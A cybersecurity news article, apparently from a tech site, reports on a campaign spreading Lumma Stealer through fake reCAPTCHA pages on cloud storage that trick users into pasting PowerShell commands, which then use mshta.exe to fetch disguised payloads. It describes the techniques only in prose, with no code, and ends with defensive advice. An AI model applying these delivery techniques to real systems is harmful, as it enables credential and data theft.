Cybercriminals Exploit Cloud Platforms to Spread Lumma Stealer Malware

A New Breed of Threat: Malware Delivered via Trusted Cloud Services

Cybercriminals are turning to mainstream cloud infrastructure platforms to carry out stealthy and highly sophisticated malware attacks, bypassing traditional detection mechanisms and exploiting user trust in big tech. The Lumma Stealer (also known as LummaC2 Stealer), a potent malware-as-a-service, is being distributed through legitimate cloud services like Oracle Cloud Infrastructure (OCI) and Scaleway Object Storage. This marks a worrying evolution in cybercrime strategy, targeting enterprise systems through deceptive human verification pages and clipboard-injected PowerShell commands.

How It Works: An In-Depth Overview of the Attack Chain

In early 2025, cybersecurity researchers uncovered a disturbing new tactic by Russian-speaking threat actors: the use of reputable cloud platforms to host malicious content and distribute malware. The attackers crafted fake reCAPTCHA pages hosted on services such as Tigris Object Storage, OCI, and Scaleway. These pages mimic legitimate verification processes and trick users—typically those with elevated system privileges—into copying and pasting dangerous PowerShell commands into their system’s “Run” dialog.

Once executed, these commands trigger scripts that utilize “Living Off the Land” binaries (LOLBins), especially mshta.exe, to fetch a disguised payload from attacker-controlled servers. Often appearing as .mp4 or .ogg media files, the payload is actually Lumma Stealer: a sophisticated infostealer capable of siphoning login credentials, cryptocurrency wallets, and system metadata. It also supports modular payloads for further exploitation.

Analysis of the malicious code uncovered consistent Russian-language comments, such as “Main container” and “Obfuscated code with garbage decoy functions,” which hint at a coordinated operation by Russian-speaking cybercriminals. While there is no confirmed state affiliation, the structure and execution suggest a well-organized network with advanced development capabilities.

The choice of cloud services is strategic. These platforms are trusted by developers and businesses, and their use allows attackers to bypass automated defenses and blacklists. Moreover, by forcing manual user interaction—copy-pasting commands instead of auto-clicks—attackers successfully evade many behavioral detection systems.

In response to public reports, platforms like Scaleway and Tigris quickly removed the malicious files and initiated stronger anti-abuse actions. Oracle, however, has not yet issued an official statement. Meanwhile, cybersecurity firms like Cato Networks have started blocking known redirection paths and have deployed intrusion detection signatures targeting this specific tactic.

The incident is a stark reminder of how trust in cloud platforms can be weaponized and highlights the need for continuous adaptation in cybersecurity strategies. Enterprises are being urged to train staff, monitor cloud storage behavior, and collaborate with providers to detect and dismantle malicious infrastructure.

What Undercode Say:

The exploitation of cloud platforms in delivering malware such as Lumma Stealer signals a dangerous shift in cyberattack paradigms. Threat actors are no longer limited to shady websites or questionable attachments. They’re now leveraging legitimate, trusted cloud environments to slip past defenses with ease.

By abusing services like Oracle Cloud and Scaleway, attackers are taking advantage of platforms that are often considered “safe zones.” Security protocols tend to be less aggressive here to avoid interrupting legitimate developer workflows, making these platforms perfect for low-detection malware hosting.

The decision to target high-privilege users adds another layer of danger. These users often hold administrative rights, meaning once compromised, attackers can move laterally across networks, exfiltrating data or escalating attacks. This kind of breach isn’t just a leak—it’s an organizational implosion waiting to happen.

Lumma Stealer’s use of LOLBins demonstrates an expert understanding of system internals. Tools like mshta.exe are part of Windows and can run scripts without raising flags. This “Living Off the Land” tactic makes the malware harder to detect and even harder to block with traditional antivirus software.

The Russian language annotations in the code may not be smoking guns for state involvement, but they’re important context. They show not only the likely geographical origin of the malware but also a deliberate effort to mislead analysts through obfuscation and junk code.

One of the most concerning elements here is the social engineering angle. The malware delivery hinges on users trusting a CAPTCHA interface and following copy-paste instructions—something that even savvy users might do in a moment of distraction. It’s a chilling reminder that even educated, security-aware professionals can be manipulated under the right conditions.

The cleanup responses from platforms like Tigris and Scaleway are commendable, but the silence from Oracle raises concerns about transparency and accountability. Tech giants need to take a more proactive stance in monitoring and managing abuse of their services.

This campaign also underscores the need for improved user education. Employees should be trained not just on phishing emails but on subtler tricks like clipboard-based command injection. Security culture must evolve to keep pace with criminal creativity.

From a defense standpoint, it’s vital to shift toward behavior-based detection, not just signature-based. MDR (Managed Detection and Response) services, threat intelligence sharing, and real-time analytics must become the norm. Static defenses are no longer sufficient in a dynamic, cloud-integrated threat landscape.

Organizations should also implement strict application whitelisting and enforce least-privilege principles. This way, even if malware is executed, its impact is minimized.

In the future, expect to see more of this cloud abuse strategy. It’s cost-effective for attackers, difficult to detect, and highly scalable. Only through cross-sector collaboration and cloud-provider vigilance can we hope to contain this emerging threat.

Fact Checker Results ✅

Verified abuse of cloud services including OCI and Scaleway
Confirmed distribution of Lumma Stealer via fake reCAPTCHA pages
Russian-language code annotations consistently observed in analyzed samples 🕵️‍♂️

Prediction 🔮

Given the success of this campaign, more threat actors will likely follow suit, using cloud platforms for malware hosting due to the inherent trust and flexibility these services offer. Expect further innovations in social engineering combined with evasive scripting, especially targeting privileged enterprise accounts. Cloud service providers will face increasing pressure to strengthen content monitoring and automate abuse detection systems.